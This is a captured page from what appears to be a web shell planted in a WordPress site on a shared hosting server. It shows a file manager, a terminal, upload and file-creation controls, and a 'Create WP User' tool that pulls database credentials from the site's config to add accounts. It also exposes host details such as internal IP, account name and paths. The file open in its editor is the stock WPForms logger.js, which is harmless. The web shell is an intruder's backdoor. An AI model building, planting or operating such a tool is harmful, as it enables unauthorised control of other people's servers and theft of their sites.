Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat_30102025
/
wp-content
/
plugins
/
wpforms-lite
/
assets
/
js
/
components
/
admin
/
logger
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
logger.js
2.04 KB
-rw-r--r--
2023-12-02 11:21
logger.min.js
1021.00 B
-rw-r--r--
2023-12-02 11:21
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
logger.js
/* global wpforms_admin */ /** * Logger scripts * * @since 1.6.3 */ 'use strict'; var WPFormsLogger = window.WPFormsLogger || ( function( document, window, $ ) { var app = { /** * Start the engine. * * @since 1.6.3 */ init: function() { $( app.ready ); }, ready: function() { $( app.bindPopup() ); }, /** * Bind popup to the click on logger link. * * @since 1.6.3 */ bindPopup: function() { $( '.wpforms-list-table--logs .wp-list-table' ).on( 'click', '.js-single-log-target', function( e ) { e.preventDefault(); app.showPopup( $( this ).attr( 'data-log-id' ) ); } ); }, /** * Show popup. * * @since 1.6.3 * * @param {numeric} recordId Record Id. */ showPopup: function( recordId ) { if ( ! recordId ) { return; } var popupTemplate = wp.template( 'wpforms-log-record' ); $.dialog( { title: false, boxWidth: Math.min( 550, $( window ).width() ), content: function() { var self = this; return $.get( wpforms_admin.ajax_url, { action: 'wpforms_get_log_record', nonce: wpforms_admin.nonce, recordId: recordId, } ).done( function( res ) { if ( ! res.success || ! res.data ) { app.error( res.data ); self.close(); return; } self.setContent( popupTemplate( res.data ) ); } ).fail( function( xhr, textStatus, e ) { app.error( textStatus + ' ' + xhr.responseText ); self.close(); } ); }, animation: 'scale', columnClass: 'medium', closeAnimation: 'scale', backgroundDismiss: true, } ); }, /** * Output error to the console if debug mode is on. * * @since 1.6.4 * * @param {string} msg Error text. */ error: function( msg ) { if ( ! wpforms_admin.debug ) { return; } msg = _.isEmpty( msg ) ? '' : ': ' + msg; console.log( 'WPForms Debug: Error receiving log record data' + msg ); }, }; return app; }( document, window, jQuery ) ); // Initialize. WPFormsLogger.init();
关闭
保存